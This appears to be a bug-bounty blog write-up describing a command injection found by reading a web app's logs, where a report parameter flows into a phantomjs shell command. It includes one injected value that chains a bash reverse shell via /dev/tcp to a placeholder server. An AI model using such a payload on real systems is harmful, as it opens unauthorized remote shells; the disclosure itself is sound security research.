Private Program – Backtracking logs for Command Injection.

Hey guys, Today I want to share one of my Command Injection finding in a private program, If you haven’t read my earlier post of Code Execution you will need to read it first as it will make you familiar with the kind of web app am hunting here.

What? Go read it first

So let’s start,  Now as I said in earlier post I was going through logs of this web app 2Gb 10 files ¯\_(ツ)_/¯, One line caught my attention;

/opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=your+organization&report=abc&from=now-1d&to=now#/greport/iocmatches.rpt?from=now-1d&to=now' iocmatches.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720_2017_07_02_10_58_00_002040.pdf

So the web app was executing phantom js on a URL, What caught my eyes was org_name parameter has this value your+organisation which means it may contain our input in the command. So first step was to finding from which section of the web app this command was executing and see what inputs we control, Looking at report under this URL I found out that it was running a feature called generate report which generates a pdf report,  Now lets have a look at the parameters;

{"parameter":"report_iocmatches_weekly.rpt","parameter2":"test","parameter3":"* * * * *","parameter4":{"to":"now/d","from":"now/d","mode":"quick"},"enabled":true,"created_ts":"2017-09-17T16:47:48Z","parameter5":"blah.rpt","modified_ts":"2017-09-17T16:47:48Z","parameter6":"3a71d03e9d584bd092968bc96dcb5f720","parameter7":"test","$$hashKey":"032"}

No org_name 🙁 But wait “parameter6” value reflects there let’s try this so I passed

"parameter6":"3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |"

And Bhoom!

Now, this was simple, But getting through that 2 gb of logs wasn’t easy especially when they were split in part of files :'( I found this command going in 7th part.

I learned one more thing always test parameters by fuzzing different things, You don’t know what developers doing with your input ¯\_(ツ)_/¯ . Now if you are a good reader you must have noticed this request may be prone to many other issues and one is quite awesome I would write about those soon (Some of you may have already guessed that 😉 ) That’s all for now. I will also soon write about Backtracking their OAuth endpoints for account takeover 🙂

Thanks : Prince Chaddha

Thanks for reading!

Harsh from Bugdiscloseguys!

Leave a Reply

Your email address will not be published. Required fields are marked *